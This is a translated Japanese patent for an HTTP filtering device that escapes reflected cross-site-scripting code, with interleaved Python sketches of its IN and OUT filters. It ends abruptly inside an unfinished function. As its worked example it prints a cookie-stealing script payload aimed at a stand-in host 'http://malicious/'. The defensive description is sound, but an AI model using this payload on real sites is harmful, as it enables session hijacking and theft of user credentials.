JP2005092564A - Filtering device

Info

Publication number: JP2005092564A
Application number: JP2003325597A
Authority: JP
Inventors: Hiroshi Miyazaki; 博宮崎
Original assignee: Hitachi Software Engineering Co Ltd
Current assignee: Hitachi Software Engineering Co Ltd
Priority date: 2003-09-18
Filing date: 2003-09-18
Publication date: 2005-04-07

Abstract

PROBLEM TO BE SOLVED: To remove harmful illegal code remaining in an access response from a server to a client.
SOLUTION: A device that filters an access request to a server and the corresponding access response based on rules applied in advance. It receives the access request and, when the request contains illegal code that is harmless to the server but harmful to a client, stores that code. It then receives the access response to the request and, when the stored illegal code remains in the response, removes it.
COPYRIGHT: (C)2005,JPO&NCIPI

Description

The present invention relates to a device that relays communication between a client and a server that returns a response to an access request from the client, and that filters out illegal code which was included in the access request and remained in the response without being removed by the server.

A firewall is one technique for preventing unauthorized access to a Web server published on the Internet. The firewall receives an access request addressed to the Web server on the server's behalf, forwards it to the Web server if it conforms to predetermined rules, and otherwise does not forward it.
One type of such firewall aims to prevent unauthorized access that exploits vulnerabilities in a Web server or in a Web application built on the Web server. The firewall disclosed in JP 2002-342279 A is an example. It analyzes HTTP (Hyper-Text Transfer Protocol) traffic exchanged with the Web server and compares it with known unauthorized-access patterns to detect unauthorized access.

Meanwhile, the Web browsers in wide use today (client-side software for accessing Web servers) are able to execute programs written in a script language (hereinafter, scripts). A script is normally embedded in an HTML (Hyper-Text Markup Language) document and sent from the Web server to the Web browser in response to an access request. The delivered script provides various functions that are impossible in a document written in HTML alone. Typical script languages that Web browsers can execute include JavaScript (Java is a registered trademark) and VBScript. Scripts written in these languages can access various information related to the HTML document in which they are embedded and can automatically send access requests to a Web server.
JP 2002-342279 A

One vulnerability of Web applications is known as the cross-site scripting vulnerability. A Web application with this vulnerability fails to remove a script contained in an access request and returns it in the response to the Web browser. By exploiting it, a malicious party can make a third party's Web browser load and execute a malicious script.
To make the third party send an access request with an embedded malicious script, the malicious party sets a trap. For example, the attacker places on his or her own home page a link to the target Web application, crafted so that clicking it sends the Web application an access request containing the malicious script. When a third party who happens to visit the booby-trapped page clicks the link, that party's Web browser sends the access request with the malicious script to the Web application. If the Web application fails to remove the script and includes it in the response, the script is executed in the Web browser that receives the response.
Many Web applications identify the communication session with each Web browser by embedding a session ID in the part of the HTTP exchange called a cookie. If such a Web application has the cross-site scripting vulnerability described above, a malicious party can feed a browser that accesses the application a malicious script that reads the cookie and sends it to another Web server, and thereby steal the session ID. With the stolen session ID, the attacker can carry out a so-called session hijacking attack: accessing the Web application illegitimately while impersonating the Web browser (that is, its user) to which the session ID was originally assigned.

The cross-site scripting vulnerability can be avoided if the Web application properly removes malicious scripts contained in access requests from Web browsers and does not include them in its responses. However, because of carelessness or insufficient skill on the part of the engineers who build Web applications, many Web applications are said to have this vulnerability.
The vulnerability, attack methods that exploit it, and Web sites whose Web applications have it are described in detail in the following non-patent document.
Hiromitsu Takagi et al.: Vulnerability of e-commerce sites against cross-site scripting attacks and countermeasures: IPSJ CSEC 4th Computer Security Symposium (CSS 2001)

One conceivable way to protect a Web application from attacks that exploit the cross-site scripting vulnerability is, as in JP 2002-342279 A, to receive access requests on behalf of the Web application and filter them.
For example, if an access request contains "data regarded as illegal", such as data enclosed between "<SCRIPT>" and "</SCRIPT>" (which mark a script in an HTML document), the request is simply not forwarded to the Web application. However, where data sent by the user is used as-is as input to the Web application, as in a home page search service, it is sometimes impossible to filter the request in advance.
When responses from the Web application are filtered instead, the HTML document in a response may contain not only a script that was in the access request but also scripts embedded by the Web application itself. To distinguish them, information about the legitimate scripts (such as the URI (uniform resource identifier) of the Web page and the position within the page) must be registered with the filter beforehand in some way. Doing this by hand is laborious, especially for a large Web site, and entries may be missed. Automating the registration is difficult for Web pages whose content changes with the content of the access request.

Accordingly, an object of the present invention is to provide a filtering device that monitors both the access request to a Web application and the response to that request, and has means for removing from the response code that is predetermined to be regarded as illegal.

To achieve the above object, the filtering device of the present invention relays communication between a client and a server that returns an access response to an access request from the client, and comprises an IN filter that filters the access request based on illegal code detection rules stored in advance in a rule table, and an OUT filter that filters the access response based on the illegal code detection rules.
The IN filter comprises means for receiving the access request from the client, checking whether the access request contains code specified in an illegal code detection rule, and, if so, copying that code to a buffer memory.
The OUT filter comprises means for receiving the access response from the server, checking whether the access response contains code corresponding to the code stored in the buffer memory, and, if so, changing that code according to the processing specified in the illegal code detection rule that detected the stored code.
The illegal code detection rule is an illegal tag detection rule, that is, a rule for detecting an illegal tag.
The illegal code detection rule is an illegal tag attribute value detection rule, that is, a rule for detecting an illegal tag attribute value.
The device further comprises an interface for updating the illegal code detection rules.
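The division of labor between the two filters can be sketched as follows. This is a minimal illustration under stated assumptions, not the patented implementation: the names `SCRIPT_RE`, `in_filter`, and `out_filter` are hypothetical, a single hard-coded pattern stands in for the rule table, and "changing" the code is reduced to plain removal.

```python
import re

# Assumption: "illegal code" is any <script> element (case-insensitive).
# A real device would take its patterns from the rule table instead.
SCRIPT_RE = re.compile(r"<script\b.*?</script\s*>", re.IGNORECASE | re.DOTALL)


def in_filter(request_input: str) -> list[str]:
    """Copy suspicious fragments to a buffer; the request itself is left untouched."""
    return [m.group(0) for m in SCRIPT_RE.finditer(request_input)]


def out_filter(response_body: str, buffer: list[str]) -> str:
    """Remove only the fragments that were recorded from the request."""
    for fragment in buffer:
        response_body = response_body.replace(fragment, "")
    return response_body


user_input = "test<script>alert(1)</script>"
buffer = in_filter(user_input)

# The application echoes the input and also embeds a script of its own.
response = (
    "<html><script>initPage()</script>"
    "<p>No match for " + user_input + "</p></html>"
)
cleaned = out_filter(response, buffer)
```

In this sketch the application's own `initPage()` script survives because it never appeared in the request, which is the distinction the two-filter design is meant to make without per-page registration.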

According to the present invention, even if illegal code contained in an access request to a server is not removed by the server and remains in the response to that request, the filtering process can remove it.
In particular, even if a Web application with a cross-site scripting vulnerability includes in its HTTP response a malicious script that was contained in the received HTTP request, the script is removed by the filtering process of the present invention and is not executed in the Web browser that receives the HTTP response.
The filtering device of the present invention does not remove illegal code from the access request; it marks the code as suspect and removes it only if the marked code remains in the response to that request. It can therefore remove code that is harmless and meaningful to the server but harmful to the client.
Such illegal code should properly be removed by the server. However, as the existence of Web applications with cross-site scripting vulnerabilities shows, illegal code can remain in a response because of carelessness or insufficient skill on the part of those who develop the request handling and response generation. The filtering device of the present invention resolves this problem as well.
Furthermore, many Web applications embed harmless scripts in HTML documents and send them to clients. Such scripts must be distinguished from a malicious script that was contained in the HTTP request and mistakenly left in the HTTP response. Having the Web application developer tell the filtering device, for each HTML document, the position of each harmless script or the script itself would take considerable effort. For dynamically generated HTML documents in particular, the scripts included may differ from one generation to the next, so the way of specifying them can be expected to become complicated. The filtering device of the present invention marks illegal code when the access request is received and removes it if it remains in the access response. The distinction is therefore made automatically, saving the server administrator's effort. The administrator's only task is to devise a few filtering rules and give them to the filtering device. Moreover, for widely known problems such as the cross-site scripting vulnerability, rules like those shown in the embodiment can be shared generally. As the invention spreads, Web application developers will only need to obtain appropriate rules from a trusted source and set them in the filtering device, much as one obtains virus definition files for detecting and removing computer viruses.

Embodiments of the present invention are described in detail below with reference to the drawings.
FIG. 1 is a system configuration diagram showing an embodiment of a network system to which the filtering device of the present invention is applied.
In FIG. 1, reference numeral 101 denotes a network over which communication data between computers flows. This embodiment uses HTTP as the example communication protocol between computers, but the procedure shown here is also applicable to other protocols.
Reference numeral 102 denotes a client computer connected to the network 101. A Web browser 103 runs on the client computer 102. The user operates the Web browser 103 through the client computer 102 and sends HTTP requests to the Web server 105 connected to the network 101.
Reference numeral 104 denotes a server computer, on which the Web server 105 and a Web application 106 run. The Web server 105 accepts an HTTP request from the Web browser 103 and passes it to the Web application 106. The Web application 106 performs predetermined processing on the data contained in the HTTP request, generates an HTTP response, and passes it to the Web server 105. The Web server 105 then sends the HTTP response to the Web browser 103.
Here, the Web application 106 uses the HTML form function to have the user operating the Web browser enter a character string, and receives that string in an HTTP request. It then generates an HTML document that displays the string as-is, without checking whether it contains illegal code such as a script, and sends the document back to the Web browser in the HTTP response. Which character strings are defined as illegal code depends on the Web application 106.

The Web application 106 of this embodiment is assumed to search the data in the Web site, after the user has logged in, using a search string supplied by the user, and to display the matching items. After the user logs in, a session ID is set in a cookie and is included in subsequent HTTP requests and HTTP responses. FIG. 2 shows an example of an HTML document containing the form in which the user enters the search string, and FIG. 3 shows an HTML document that displays the search result.
The character strings that the Web application 106 regards as illegal code are scripts.
Reference numeral 107 denotes the filtering device according to the present invention, which relays communication between the network 101 and the server computer 104. In doing so, the IN filter 108 and the OUT filter 109 filter the communication content based on the illegal code detection rules set in advance in the rule table 110. The rule table 110 is described in detail with reference to FIG. 4, and the filtering process with reference to FIG. 5 onward.
The rule input/output unit 111 is an interface for viewing and updating the rule table 110 from outside the filtering device 107. This embodiment does not specify the type of interface; it may be a combination of an input keyboard and a display, or a network. Through this interface, the administrator of the filtering device 107 adds illegal code detection rules to the rule table 110 or updates them.
All searches for HTML tags, attribute names, and attribute values in this embodiment are case-insensitive.

FIG. 2 shows an example of the HTML document for the input form with which the Web application 106 of this embodiment has the user enter a search string. When the user enters a search string in the Web browser 103 of the client computer 102 displaying this HTML document and presses the "search" button, the search string is included in an HTTP request and sent to the Web application 106.

FIG. 3 shows an example of the HTML document that the Web application 106 of this embodiment generates to display a search result. For simplicity, the example shows the case where no data matching the search string is found and the string itself is displayed. The search string actually entered by the user appears in place of "your_search_key" in FIG. 3.

FIG. 4 shows the details of the rule table 110 in this embodiment.
Each row of FIG. 4 except the first is a rule that governs the filtering performed by the IN filter 108 and the OUT filter 109. The columns are, in order: (1) the rule reference number; (2) the illegal code search key (hereinafter, key); (3) the tag name of an element that may contain illegal code (tag_name); (4) the name of the tag attribute to examine when the tag name alone does not determine whether illegal code is present (attr_name); (5) the attribute value for which illegal code is judged to be present (attr_value); and (6) the processing used to neutralize discovered illegal code (action).
The rule table 110 holds two kinds of rules: rules that detect illegal tags and rules that detect illegal tag attribute values.
The content of the rules depends on which character strings in an HTTP request or HTTP response are regarded as illegal code. The rules shown in FIG. 4 are only examples.
The first row of FIG. 4 is included for convenience, to make the columns of the rule table 110 easy to identify in this description, and need not be present in an actual rule table. Also, although this embodiment calls the collection of rule data a rule table for convenience, the actual data format may be whatever the filtering device can handle easily, such as a two-dimensional array or a linked list. In the present invention, such two-dimensional arrays and linked lists are collectively called a rule table.
Because new ways of injecting illegal code are discovered every day, the actual rule table format and the specific rules are not limited to those of FIG. 4.
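One possible in-memory shape for such a rule table is sketched below. The six fields mirror the columns listed above, but the class name `Rule`, the helper `rules_by_kind`, the `action` values, and the second entry are all hypothetical, since the contents of FIG. 4 are not reproduced in this text. Only the first entry (a tag_name rule for `script` with an empty attr_name) follows the example walked through in the description.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    ref_no: int      # (1) rule reference number
    key: str         # (2) search key: "tag_name" or "attr_value"
    tag_name: str    # (3) tag of an element that may contain illegal code
    attr_name: str   # (4) attribute to examine; "" when the tag alone decides
    attr_value: str  # (5) attribute value judged illegal; "" when unused
    action: str      # (6) neutralizing action (the values below are invented)


# Hypothetical table; a plain list stands in for the "two-dimensional array
# or linked list" mentioned in the description.
RULE_TABLE = [
    Rule(1, "tag_name", "script", "", "", "remove_element"),
    Rule(2, "attr_value", "img", "src", "javascript:", "remove_attribute"),
]


def rules_by_kind(table: list[Rule], key: str) -> list[Rule]:
    """Select the rules whose key column equals the given kind."""
    return [rule for rule in table if rule.key == key]
```

Keeping the rules as plain data is what would let an administrator add or replace entries through the rule input/output unit without touching the filter logic.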

FIG. 5 is a flowchart showing the processing procedure of the filtering device 107 in this embodiment.
The procedure starts when the filtering device 107 receives an HTTP request addressed to the Web server 105 and sent over the network 101.
First, in step 501, the filtering device 107 initializes the matched-string buffer, an area reserved in its memory. The matched-string buffer passes the processing result of the IN filter 108 to the OUT filter 109. Its details are described with reference to FIG. 8.
Next, in step 502, the filtering device 107 copies the received HTTP request into internal memory and passes the copy to the IN filter 108.
Next, in step 503, the IN filter 108 processes the copy of the HTTP request according to the rules in the rule table 110 and writes the result to the matched-string buffer. This processing is described in detail with reference to FIG. 6.
Next, in step 504, the filtering device 107 sends the HTTP request received from the Web browser 103 to its destination, the Web server 105.
Next, in step 505, the filtering device 107 waits until it receives from the Web server 105 the HTTP response that is the result of processing the HTTP request.
Next, in step 506, having received the HTTP response, the filtering device 107 checks whether the matched-string buffer holds a result from the IN filter 108, that is, whether code matching an illegal code detection rule was detected and stored in the buffer. If no such code was found, the buffer is empty. If code is stored, processing continues with step 507; if not, it moves to step 511.
In step 507, the filtering device 107 copies the HTTP response received from the Web server 105 into internal memory and passes the copy to the OUT filter 109.
Next, in step 508, the OUT filter 109 processes the copy of the HTTP response according to the rules in the rule table 110 and returns the result to the filtering device 107. This processing is described in detail with reference to FIG. 9.
Next, in step 509, if the output from the OUT filter 109 is an empty string, the filtering device 107 moves to step 511; otherwise it performs step 510.
In step 510, the filtering device 107 discards the HTTP response it was holding and uses the output string from the OUT filter 109 as the HTTP response to be sent to the Web browser 103.
Finally, in step 511, the filtering device 107 sends the HTTP response to the Web browser 103.
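The control flow of steps 501 to 511 can be condensed into one function, as in the sketch below. All names (`relay`, `send_to_server`, and the `demo_*` helpers) are hypothetical, HTTP messages are reduced to plain strings, and the filters are passed in as callables so that the flow can be read on its own. The convention that an empty string from the OUT filter means "nothing was changed" follows step 509.

```python
from typing import Callable


def relay(
    request: str,
    send_to_server: Callable[[str], str],
    in_filter: Callable[[str], list[str]],
    out_filter: Callable[[str, list[str]], str],
) -> str:
    matched: list[str] = []                   # step 501: initialize the buffer
    matched.extend(in_filter(request))        # steps 502-503: inspect the request
    response = send_to_server(request)        # steps 504-505: forward it unchanged
    if not matched:                           # step 506: nothing was flagged
        return response                       # step 511
    filtered = out_filter(response, matched)  # steps 507-508
    if filtered == "":                        # step 509: "" signals no change
        return response                       # step 511
    return filtered                           # steps 510-511: rewritten response


# Toy stand-ins used only to exercise the flow.
def demo_in(req: str) -> list[str]:
    return ["<script>x()</script>"] if "<script>x()</script>" in req else []


def demo_out(resp: str, matched: list[str]) -> str:
    out = resp
    for fragment in matched:
        out = out.replace(fragment, "")
    return out if out != resp else ""


def echo_server(req: str) -> str:
    return "<p>" + req + "</p>"
```

Note that the request is always forwarded unmodified; only the response path can be altered, and only when the IN filter flagged something.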

FIG. 6 is a flowchart showing the processing procedure of the IN filter 108 in this embodiment. The procedure starts when the filtering device 107 passes an HTTP request to the IN filter 108. The example followed here assumes that the HTTP request illustrated in FIG. 7 has been passed. The form input data in the HTTP request of FIG. 7 contains a script that, when executed, sends the cookie to http://malicious/.
First, in step 601, the IN filter 108 extracts the form input data contained in the HTTP request. Because the example of FIG. 7 uses the GET method, the form field names and input strings are contained in the query string of the specified URI (the part after "/cgi-bin/search?" on the first line of the figure). The form input string (the part after "key=") is extracted from it. In this example it is the following string (the enclosing double quotation marks are not part of it).
"test<script>window.open("http://malicious/save.cgi?"+escape(document.cookie))</script>"
If the POST method was used to submit the form, the form field names and form input strings are contained in the message body of the HTTP request. The form input string can be extracted from it in the same way as for the GET method.
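Step 601 can be approximated with Python's standard `urllib.parse` module, as sketched below. The function name `form_inputs` is hypothetical, the sketch assumes the usual `application/x-www-form-urlencoded` encoding for both GET and POST, and the request target is a shortened stand-in because FIG. 7 is not reproduced in this text.

```python
from urllib.parse import parse_qs, urlsplit


def form_inputs(method: str, target: str, body: str = "") -> dict[str, list[str]]:
    """Return decoded form fields from the query string (GET) or the body (POST)."""
    if method.upper() == "GET":
        encoded = urlsplit(target).query  # everything after the "?"
    else:
        encoded = body                    # the message body of the request
    # parse_qs percent-decodes names and values; keep empty fields as well.
    return parse_qs(encoded, keep_blank_values=True)


fields = form_inputs(
    "GET", "/cgi-bin/search?key=test%3Cscript%3Ealert(1)%3C%2Fscript%3E"
)
```

Decoding before matching matters here: a search for "<script" on the raw, percent-encoded query string would miss the tag.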

Next, in step 602, the IN filter 108 checks whether all the rules in the rule table 110 have been applied to the form input character string. If all have been applied, this procedure ends; otherwise, the procedure proceeds to the next step.
In step 603, the IN filter 108 reads the next rule from the rule table 110. In the example taken up in this procedure, the first rule in FIG. 4, the rule with rule reference number 1, is read first.
Next, in step 604, the IN filter 108 extracts the data in the key column of the rule that was read. If it is tag_name, the process proceeds to step 605; if it is attr_value, the process proceeds to step 609. The example taken up in this procedure corresponds to the former, so the process proceeds to step 605.
In step 605, the IN filter 108 checks whether an HTML element with the tag name (script, style, img, etc.) specified in the tag_name column of the rule exists in the form input character string. For this purpose, the character "<" is prepended to the tag name and the form input character string is searched for the result. If it exists, the process proceeds to step 606; if it does not exist, the process returns to step 602. In the example taken up in this procedure, the form input character string of step 601 is searched for the character string "<script". A matching character string is found, so the process proceeds to step 606.
In step 606, the IN filter 108 extracts the data in the attr_name column of the rule read from the rule table 110. If it is an empty character string, the form input character string is determined to be illegal code, and the process proceeds to step 608. Otherwise, the process proceeds to step 607. In the example taken up in this procedure, the data in the attr_name column is an empty character string, so the process proceeds to step 608.
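Steps 605 and 606 can be sketched in Python as follows. The Rule class, its field layout, and the function name tag_name_check are hypothetical, since FIG. 4 is not reproduced here; the two rules are reconstructed from the description. The case-insensitive comparison is also an assumption, because the description does not say how letter case is handled.

```python
from dataclasses import dataclass

@dataclass
class Rule:
    ref: int               # rule reference number
    key: str               # "tag_name" or "attr_value"
    tag_name: str
    attr_name: str = ""
    attr_value: str = ""

def tag_name_check(rule, form_input):
    """Steps 605-606: return "no_match", "illegal" or "check_attribute"."""
    # Step 605: search for "<" followed by the tag name.
    if ("<" + rule.tag_name).lower() not in form_input.lower():
        return "no_match"              # back to step 602
    # Step 606: with an empty attr_name the tag alone marks illegal code.
    return "illegal" if rule.attr_name == "" else "check_attribute"

rule1 = Rule(1, "tag_name", "script")
rule2 = Rule(2, "tag_name", "style", "type", "text/javascript")
result = tag_name_check(rule1, "test<script>window.open()</script>")
```

For rule1 the result is "illegal" (go to step 608), while rule2 applied to a style tag yields "check_attribute" (go to step 607).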

In step 607, the IN filter 108 concatenates the character string in the attr_name column of the rule, the character "=", and the character string in the attr_value column, and searches whether this character string, which specifies an attribute of the tag in the tag_name column, is included in the form input character string. If it is included, the form input character string is regarded as illegal code, and the process proceeds to step 608. If it is not included, the process returns to step 602.
In practice, as shown in FIGS. 2 and 3, a tag attribute value may be enclosed in double quotation marks ("), and blank characters of arbitrary length (spaces, tabs, line feeds, etc.) may appear before and after "=", so the search takes these into account. In addition, the tag attribute value must appear after the tag name and before the character ">", so this point is also taken into account in the search.
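One possible way to perform the search of step 607 while allowing for quotation marks, blank characters around "=", and the requirement that the attribute appear before ">" is a regular expression. The following Python sketch is only an illustration under those assumptions; the function name has_attribute is hypothetical, and the pattern does not handle a ">" that appears inside another attribute value.

```python
import re

def has_attribute(form_input, tag_name, attr_name, attr_value):
    """Step 607 sketch: is attr_name=attr_value given inside <tag_name ...>?"""
    pattern = (
        "<" + re.escape(tag_name) + r"\b"   # tag start string
        + r"[^>]*?"                         # stay in front of the closing ">"
        + r"\b" + re.escape(attr_name)
        + r"\s*=\s*"                        # blank characters around "="
        + "[\"']?"                          # optional opening quotation mark
        + re.escape(attr_value)
    )
    return re.search(pattern, form_input, re.IGNORECASE) is not None

found = has_attribute('<style type = "text/javascript">x</style>',
                      "style", "type", "text/javascript")
```

A string such as "<style>type=text/javascript</style>" is not matched, because the attribute text lies after the ">" that closes the tag.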

Step 607 is executed when the form input character string contains a character string that cannot be determined to be illegal code from the tag name alone, and the rule being applied specifies an attribute name and an attribute value in the attr_name and attr_value columns, as in the rule with rule reference number 2 in FIG. 4.
For example, a character string containing a style tag such as "<style type=text/javascript>…</style>" cannot be determined from the tag name alone to contain illegal code such as a script. It is therefore necessary to search for the attribute value as described above.
In step 608, the IN filter 108 pairs the form input character string in which illegal code was found with the rule reference number used to find it, adds the pair to the matching character string buffer, and returns to step 602. In the example taken up in this procedure, the entry is recorded in the matching character string buffer as shown in FIG. 8.

On the other hand, in step 609, the IN filter 108 searches whether the character string in the attr_value column of the rule is included in the form input character string. If it is found, the process proceeds to step 608; if it is not found, the process returns to step 602.
Step 609 is processing for finding an illegal tag attribute value, that is, illegal code contained in the attribute value of a tag. For example, if a URI containing a script, such as "javascript:…", is given to a tag attribute that can specify a URI, the script in the "…" part is executed. An example of such a tag is "<img src=javascript:…>". The rule with rule reference number n in FIG. 4 is for finding such illegal code.
Illegal code embedded in an attribute value can arise in two ways. In the first, the tag and its attribute are embedded together in the form input character string (for example, "<img src=javascript:…>") and appear as they are in the HTML document of the HTTP response. In the second, the form input character string is embedded in the attribute value of a tag by the Web application (for example, "javascript:…" replaces the "$" in "<img src=$>") and appears in the HTML document of the HTTP response.
In the latter case, however, if the form input character string is not treated as an attribute value by the Web application 106 and merely appears elsewhere in the HTML document of the HTTP response, the Web browser 103 that receives the HTTP response is not adversely affected. Therefore, whether the character string is illegal code cannot be determined simply by examining the form input character string. For this reason, when the IN filter 108 finds such a possibly illegal character string, it copies the character string to the matching character string buffer (step 608), and the OUT filter 109 determines whether it is illegal code.
For simplicity, this procedure has been described for the case of a single form input item. If the form has a plurality of input data items, the items are delimited by the character "&" in the HTTP request and can easily be extracted in step 601. For each rule, the processing of steps 605 to 608, or of steps 609 and 608, is performed on all input items before the process returns to step 602 and moves on to the next rule.
In the determination of step 604, the flow branching to step 605 is the processing that uses the illegal tag detection rule, and the flow branching to step 609 is the processing that uses the illegal tag attribute value detection rule.
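The overall flow of steps 602 to 609, including the handling of several input items per rule, can be sketched as follows. This is a minimal Python sketch, not the embodiment's implementation: the dictionary layout of RULES is a hypothetical reconstruction of FIG. 4, the function name in_filter is invented for illustration, and step 607 is reduced to a plain substring search.

```python
RULES = [
    {"ref": 1, "key": "tag_name", "tag_name": "script",
     "attr_name": "", "attr_value": ""},
    {"ref": 2, "key": "tag_name", "tag_name": "style",
     "attr_name": "type", "attr_value": "text/javascript"},
    {"ref": 3, "key": "attr_value", "tag_name": "img",
     "attr_name": "src", "attr_value": "javascript:"},
]

def in_filter(form_inputs, rules):
    """Return the match buffer as (rule reference number, input string) pairs."""
    match_buffer = []
    for rule in rules:                              # steps 602-603
        for value in form_inputs:                   # every input item per rule
            if rule["key"] == "tag_name":           # step 604 -> step 605
                hit = ("<" + rule["tag_name"]) in value
                if hit and rule["attr_name"]:       # step 606 -> step 607
                    hit = (rule["attr_name"] + "=" + rule["attr_value"]) in value
            else:                                   # step 604 -> step 609
                hit = rule["attr_value"] in value
            if hit:                                 # step 608
                match_buffer.append((rule["ref"], value))
    return match_buffer

payload = ('test<script>window.open("http://malicious/save.cgi?"'
           '+escape(document.cookie))</script>')
buffer = in_filter([payload, "javascript:alert(1)", "hello"], RULES)
```

The second entry is only a candidate at this point: whether "javascript:alert(1)" is harmful depends on where the Web application places it, which is why the decision is left to the OUT filter.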

FIG. 7 is an example of an HTTP request sent from the Web browser 103. The form input data included in this HTTP request contains a script that, when executed, sends a cookie to http://malicious/. For simplicity, the fields of the HTTP request header that are not needed to describe the embodiment are omitted.
FIG. 8 shows the matching character string buffer in the present embodiment.
The first column is the rule reference number, and the second column is the form input character string that is, or may be, illegal code (hereinafter referred to as the matching character string). Each row forms one set of data.

FIG. 9 is a flowchart showing the processing procedure of the OUT filter 109 in the present embodiment.
This procedure starts when a copy of the HTTP response is passed to the OUT filter 109. In the example taken up in this procedure, the HTTP response passed is assumed to be one that contains illegal code, as shown in FIG. 10. In this HTTP response, the script that was included in the HTTP request of FIG. 7 and that sends a cookie to http://malicious/ when executed remains, because the Web application 106 did not escape it properly.
First, in step 901, the OUT filter 109 checks whether all entries in the matching character string buffer of FIG. 8 have been examined. If they have, the process proceeds to step 909; if not, the process proceeds to step 902.
In step 902, the OUT filter 109 reads the next entry in the matching character string buffer. In the example of FIG. 8, the data in the first row is read.
In step 903, the OUT filter 109 checks whether the matching character string of the entry is included in the HTTP response. If it is included, the process proceeds to step 904; if it is not included, the process returns to step 901. The HTTP response shown in the example of FIG. 10 contains the matching character string, so the process proceeds to step 904.
In step 904, the OUT filter 109 reads the rule with the rule reference number of the entry from the rule table 110. In the example taken up in this procedure, the rule with rule reference number 1 is read from the rule table of FIG. 4.
Next, in step 905, if the key column of the rule is tag_name, the OUT filter 109 regards the matching character string as illegal code and proceeds to step 908. If it is attr_value, the process proceeds to step 906. In the example taken up in this procedure, it is tag_name, so the process proceeds to step 908.
In step 906, the OUT filter 109 checks whether the character string formed by appending the character "=" to the attr_name column of the rule exists immediately before the matching character string found in step 903. If it exists, the process proceeds to step 907; if it does not exist, the process returns to step 901.

The processing of step 906 amounts to searching for the attribute specified by the attr_name and attr_value columns of the rule. Taking the rule with rule reference number 3 in FIG. 4 as an example, it checks whether the matching character string found in the HTTP response appears in an attribute specification of the form "src=javascript:". In practice, as shown in FIGS. 2 and 3, a tag attribute value may be enclosed in double quotation marks ("), and blank characters of arbitrary length (spaces, tabs, line feeds, etc.) may appear before and after "=", so the check takes these into account.
In step 907, the OUT filter 109 checks whether a tag start character string, formed by concatenating the character "<" and the tag_name column of the rule, exists before the attribute specification character string found in step 906. If it exists, the attribute specification character string that was found is regarded as illegal code, and the process proceeds to step 908. If it does not exist, the process returns to step 901.
If the character ">" occurs between the tag start character string and the attribute specification character string that was found, the attribute specification character string is not written inside the tag and is therefore not an attribute value, so the process returns to step 901. However, the tag start character string or the character ">" may themselves be contained in other attribute values, so the search for the tag start character string takes this into account.
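The checks of steps 906 and 907 can be sketched in Python as follows. The function name is_attribute_value and its parameters are hypothetical. The sketch allows for blank characters and an opening quotation mark, but, as a stated simplification, it does not handle a tag start character string or a ">" that is itself contained in another attribute value.

```python
import re

def is_attribute_value(html, pos, tag_name, attr_name):
    """Steps 906-907 for a matching string found at index pos of the response."""
    before = html[:pos]
    # Step 906: attr_name, "=", optional blanks and quote right before the match.
    m = re.search(r"\b" + re.escape(attr_name) + r"\s*=\s*[\"']?$",
                  before, re.IGNORECASE)
    if m is None:
        return False
    # Step 907: look backwards for the tag start string "<tag_name".
    head = before[:m.start()]
    start = head.lower().rfind("<" + tag_name.lower())
    if start == -1:
        return False
    # A ">" between tag start and attribute means the tag was already closed.
    return ">" not in head[start:]

page = '<p>result</p><img src="javascript:alert(1)">'
inside = is_attribute_value(page, page.find("javascript:"), "img", "src")
```

For a page such as '<img alt="x">src=javascript:alert(1)' the same call returns False, because the ">" shows that the text lies outside the img tag.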

In step 908, the OUT filter 109 applies the processing specified in the action column of the rule to the illegal code, and returns to step 901.
In the determination of step 905, the flow branching to step 908 is the processing that uses the illegal tag detection rule, and the flow branching to step 906 is the processing that uses the illegal tag attribute value detection rule.
In the example taken up in this procedure, the processing specified in rule 1, the first row of the rule table 110 in FIG. 4, is performed, and the script included in the HTTP response is converted into the following character string, which is not executed (not including the double quotation marks at both ends).
"test&lt;script&gt;window.open("http://malicious/save.cgi?"+escape(document.cookie))&lt;/script&gt;"
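The loop of steps 901 to 908 for an illegal tag detection rule can be sketched as follows. This Python sketch makes several assumptions that are not part of the embodiment: the names escape_element and out_filter are invented, the rule table is a dictionary keyed by rule reference number, the conversion replaces "<", ">" and "&" with the HTML entities "&lt;", "&gt;" and "&amp;", and the whole matching character string is escaped rather than only the element inside it.

```python
def escape_element(text):
    """Replace "&", "<" and ">"; "&" goes first so new entities stay intact."""
    for old, new in (("&", "&amp;"), ("<", "&lt;"), (">", "&gt;")):
        text = text.replace(old, new)
    return text

def out_filter(response_body, match_buffer, rules):
    """Steps 901-908 for tag_name rules; returns (body, changed)."""
    changed = False
    for ref, matched in match_buffer:            # steps 901-902
        if matched not in response_body:         # step 903
            continue
        rule = rules[ref]                        # step 904
        if rule["key"] != "tag_name":            # step 905 (906-907 omitted)
            continue
        response_body = response_body.replace(matched, escape_element(matched))
        changed = True                           # step 908 done
    return response_body, changed

payload = ('test<script>window.open("http://malicious/save.cgi?"'
           '+escape(document.cookie))</script>')
body = "<html><body>Results for " + payload + "</body></html>"
new_body, changed = out_filter(body, [(1, payload)], {1: {"key": "tag_name"}})
```

The changed flag corresponds to the check made later in step 909.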

The processing in the action column shown in the rule table of FIG. 4 is written in the format "target: process, process, …". When the target is element, the HTML element of the tag specified in the tag_name column of the rule, contained in the illegal code, is the processing target. When the target is attr, the attribute specified in the attr_name column of the rule, contained in the illegal code, is the processing target. The process {"a", "b"} means replacing the character string "a" with the character string "b", and del means deletion. Accordingly, the processing specified by the rule with reference number 1 in FIG. 4 changes "<" to "&lt;", ">" to "&gt;", and "&" to "&amp;" within the element "<script>…</script>" enclosed by script tags.
The rule with reference number 2 specifies that the same change is made to the element enclosed by style tags, and the rule with reference number 3 specifies that the attribute src in the image tag is deleted.
In step 909, the OUT filter 109 checks whether the HTML document included in the HTTP response has been changed. If it has been changed, the process proceeds to step 910; if not, the process proceeds to step 911. In the example taken up in this procedure, the HTML document is changed, so the process proceeds to step 910.
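The "target: process, process, …" format of the action column could be interpreted as in the following Python sketch. The concrete spelling of the action strings, the entity replacements used in the example, and the names parse_action and apply_processes are assumptions for illustration, since FIG. 4 is not reproduced here. The replacements are applied in a single pass so that the "&" introduced by one replacement is not replaced again by another.

```python
import re

def parse_action(action):
    """Split 'target: process, process, ...' into (target, processes)."""
    target, _, body = action.partition(":")
    processes = []
    # A process is either {"a", "b"} (replace a with b) or the word del.
    for m in re.finditer(r'\{\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\}|\bdel\b', body):
        if m.group(0) == "del":
            processes.append(("del",))
        else:
            processes.append(("replace", m.group(1), m.group(2)))
    return target.strip(), processes

def apply_processes(text, processes):
    """Apply the processes to the text of the processing target."""
    if any(p[0] == "del" for p in processes):
        return ""                                  # del removes the target
    table = {p[1]: p[2] for p in processes}
    if not table:
        return text
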